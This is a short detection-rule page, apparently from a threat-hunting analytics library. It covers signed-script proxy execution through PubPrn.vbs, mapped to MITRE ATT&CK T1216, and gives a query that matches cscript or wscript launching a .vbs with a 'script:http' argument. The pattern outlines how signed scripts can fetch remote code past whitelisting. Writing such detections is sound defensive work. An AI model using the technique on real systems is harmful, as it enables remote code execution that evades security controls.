Proxied Execution via Signed Scripts¶
Signed script scripts such as PubPrn.vbs can be used to proxy execution from a remote site while bypassing signature validation restrictions and potentially application whitelisting.
id: | 0d62a884-1052-44d0-a76c-1f4845e348d2 |
---|---|
categories: | enrich |
confidence: | low |
os: | windows |
created: | 7/26/2019 |
updated: | 7/26/2019 |
MITRE ATT&CK™ Mapping¶
tactics: | Defense Evasion, Execution |
---|---|
techniques: | T1216 Signed Script Proxy Execution |
Query¶
process where subtype.create and
process_name in ("cscript.exe", "wscript.exe") and
command_line == "* *.vbs* *script:http*"